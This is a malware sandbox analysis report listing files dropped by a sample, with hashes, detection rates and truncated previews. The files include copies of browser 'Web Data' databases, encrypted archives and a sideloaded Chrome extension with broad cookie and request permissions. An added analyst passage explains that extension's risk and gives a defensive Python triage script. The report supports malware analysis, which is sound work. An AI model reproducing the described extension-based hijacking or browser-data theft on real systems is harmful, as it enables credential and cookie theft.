MD5: 84878B1A26F8544BDA4E069320AD8E7D
SHA1: 51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256: 809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512: 4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 268744
Entropy (8bit): 5.398284390686728
Encrypted: false
SSDEEP: 6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5: E2E9483568DC53F68BE0B80C34FE27FB
SHA1: 8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256: 205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512: B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 8%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 73160
Entropy (8bit): 6.49500452335621
Encrypted: false
SSDEEP: 1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5: F0372FF8A6148498B19E04203DBB9E69
SHA1: 27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256: 298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512: 65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\download\atl71.dll
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 89600
Entropy (8bit): 6.46929682960805
Encrypted: false
SSDEEP: 1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5: 79CB6457C81ADA9EB7F2087CE799AAA7
SHA1: 322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256: A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512: ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92080
                                                                                                                                                Entropy (8bit):5.923150781730819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 3%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\download_user.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3512776
                                                                                                                                                Entropy (8bit):6.514740710935125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):503808
                                                                                                                                                Entropy (8bit):6.4043708480235715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348160
                                                                                                                                                Entropy (8bit):6.56488891304105
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59904
                                                                                                                                                Entropy (8bit):6.753320551944624
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\ecvFEAD.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x0e9c6472, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26738688
                                                                                                                                                Entropy (8bit):0.919147268799695
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:GqX+wPy7f2s6JhNIhenjNa2fVccgeTaNX:G8s6Rn
                                                                                                                                                MD5:CEBB58A6BA0A64A6853BBE61CF15F909
                                                                                                                                                SHA1:15A85A4F09758DD26BEB3A867DEBB36E093F8BEE
                                                                                                                                                SHA-256:334F3C3C11CE18571D4827950985CEC05B162C868B443D3CADFAFEE187E57B29
                                                                                                                                                SHA-512:E9AF84474677FC19F0FB7A32962B87A311AF607582568ECD80EB13B5EAA11A72061F69F1654F83C1C6AEBD116FA60BF91502CE61F06BCAC0662160FE0E7AE103
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ..dr... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ........$...y......................................................................................................................................................................................................................................C.'..$...y.}................w~.`'....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:;1033
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):237056
                                                                                                                                                Entropy (8bit):6.262405449836627
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1397922
                                                                                                                                                Entropy (8bit):7.999863097294012
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):293320
                                                                                                                                                Entropy (8bit):6.347427939821131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Web Data1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36105
                                                                                                                                                Entropy (8bit):7.994610469125073
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                C:\Users\user\AppData\Local\crx.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1981
                                                                                                                                                Entropy (8bit):5.365969892012237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
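crx.json is a Chrome extension preferences record, and the part of it shown above is the interesting part: granted_permissions includes cookies, history, management, downloads, webRequest and webRequestBlocking on http://*/* and https://*/*, extension_can_script_all_urls is true, from_webstore is false (the extension was sideloaded, not installed from the Web Store), and the manifest declares a persistent background page behind a browser action titled book_helper. That combination lets the extension read every page, intercept and rewrite every request and harvest cookies on any site, which is the profile of a traffic-hijacking or credential-stealing extension rather than a bookmark helper. As an added example, not code from the report or from the sample, the following Python scores such a record so an analyst can triage extension preferences pulled from a host. The risk list and the weights are this example's own heuristic, not a Chromium classification, and the input record is constructed from the fields visible in the preview; it is not the complete dropped file.

```python
import json

# Extension API permissions that give cross-site data access or control over
# traffic. The list and the weights further down are this example's own triage
# heuristic (an assumption), not a Chromium classification.
HIGH_RISK_APIS = {
    "cookies": "read and write cookies for every host it can script",
    "webRequest": "observe every HTTP(S) request",
    "webRequestBlocking": "rewrite or block requests synchronously",
    "history": "read browsing history",
    "management": "enumerate and disable other extensions",
    "downloads": "start downloads silently",
    "browsingData": "wipe browsing data",
    "contentSettings": "change per-site security settings",
    "privacy": "change privacy settings",
    "tabs": "read every tab's URL and title",
}
# Host match patterns that cover every http/https origin.
ALL_URL_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def triage_extension_prefs(entry: dict) -> dict:
    """Score one extension record in the shape of Chrome's preferences file
    (the layout of the dropped crx.json) and list the reasons for the score."""
    granted = entry.get("granted_permissions", {})
    apis = set(granted.get("api", []))
    hosts = set(granted.get("scriptable_host", [])) | set(granted.get("explicit_host", []))
    manifest = entry.get("manifest", {})

    risky = sorted(apis & set(HIGH_RISK_APIS))
    all_urls = bool(hosts & ALL_URL_PATTERNS) or bool(entry.get("extension_can_script_all_urls"))
    sideloaded = not entry.get("from_webstore", False)
    persistent = bool(manifest.get("background", {}).get("persistent"))

    findings = [f"{api}: {HIGH_RISK_APIS[api]}" for api in risky]
    if all_urls:
        findings.append("content scripts can run on every http/https page")
    if sideloaded:
        findings.append("not installed from the Chrome Web Store")
    if persistent:
        findings.append("persistent background page keeps running between events")

    title = manifest.get("browser_action", {}).get("default_title") or manifest.get("name")
    return {
        "name": title,
        "risky_apis": risky,
        "all_urls": all_urls,
        "sideloaded": sideloaded,
        "persistent_background": persistent,
        # weights are this example's heuristic: one point per risky API,
        # three for all-URL scripting, two for sideloading, one for persistence
        "score": len(risky) + 3 * all_urls + 2 * sideloaded + persistent,
        "findings": findings,
    }


def triage_extension_prefs_file(text: str) -> dict:
    """Accept the raw single-line JSON exactly as it is dropped on disk."""
    return triage_extension_prefs(json.loads(text))


# Constructed input (not the complete dropped file): a record carrying the
# fields visible in the crx.json preview, serialised as one JSON line.
SAMPLE_PREFS_JSON = json.dumps({
    "extension_can_script_all_urls": True,
    "from_webstore": False,
    "granted_permissions": {
        "api": ["activeTab", "browsingData", "contentSettings", "contextMenus",
                "cookies", "downloads", "downloadsInternal", "history", "management",
                "privacy", "storage", "tabs", "topSites", "webNavigation",
                "webRequest", "webRequestBlocking"],
        "scriptable_host": ["http://*/*", "https://*/*"],
    },
    "location": 1,
    "manifest": {
        "background": {"persistent": True, "scripts": ["jquery-1.8.3.min.js", "background.js"]},
        "browser_action": {"default_icon": "icon.png", "default_popup": "popup.html",
                           "default_title": "book_helper"},
    },
})

if __name__ == "__main__":
    result = triage_extension_prefs_file(SAMPLE_PREFS_JSON)
    print(result["name"], "score", result["score"])
    for line in result["findings"]:
        print(" -", line)
```

On a live host the same function can be run over every entry under extensions.settings in the profile's Preferences or Secure Preferences file; a high score with from_webstore false is the combination worth pulling the extension directory for.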
                                                                                                                                                C:\Users\user\AppData\Localwebdata1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
